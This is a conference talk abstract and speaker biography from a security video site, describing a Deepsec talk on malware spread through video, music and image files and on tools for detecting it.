This video is part of the Infosec Video Collection at SecurityTube.net: http://www.securitytube.net
Deepsec - Malware goes to the Movies
Dr. Aleksandr Yampolskiy, Gilt GroupeAs the criminals adapt, they look for new ways to distribute malware. This talk will examine new types of malware that spread through online videos, music files, and images. We begin by analyzing media malware trends, and discover that many of the attacks are not targetted and that they are usually reliant on social engineering and blackhat search engine optimization. Next, we provide a taxonomy of different attack vectors. We show that music and video files are commonly infected via URLANDEXIT script injection or DRM licensing abuse, where a user is tricked into downloading a malware posing as a --fake codec--. We analyze a growing trend of fake Youtube sites, covering the latest news events. These sites are often advertised through social networking sites, such as Facebook. We demonstrate how easy it is to set up such sites, via a YTFakeCreator toolkit. We then discuss how images of Angelina Jolie have been used to exploit JPEG GDI buffer overflow vulnerability in the past, and how it.s still prevalent nowadays. Finally, we discuss some protection mechanisms, ranging from OS configuration changes to disable URLANDEXIT commands, to a custom tool (that will be open-sourced after the talk), which can help easily detect the malware before downloading the entire video. Our tool uses some innovative ideas, such as sequential downloads of the media file, and entropy analysis to detect injected script commands.Dr. Aleksandr Yampolskiy heads Security and Compliance team in the Gilt Groupe. He is reponsible for all aspects of security: application security, protecting the company through penetration testing and auditing of network infrastructure, establishing IT security controls, conducting security awareness training, fraud detection, and overseeing PCI compliance efforts. Prior to this position, Aleksandr Yampolskiy worked at Goldman Sachs, Oracle, and Microsoft in various capacities. He has been a lead technologist for SSO, entitlement, IDM, and identity federation solutions. Aleksandr Yampolskiy has advised various businesses on best practices for integrating security into their products, while complying with internal/external policies and regulations. Aleksandr has been cited in the NY Times, Yale Scientific, and published half a dozen articles in top security conferences. In 2006, he was awarded the Best Paper Award in Public Key Cryptography conference for discovering the most efficient Verifiable Random Function to-date. He has a B.A. in Mathematics/Computer Science from New York University, and a Ph.D. in Cryptography from Yale University.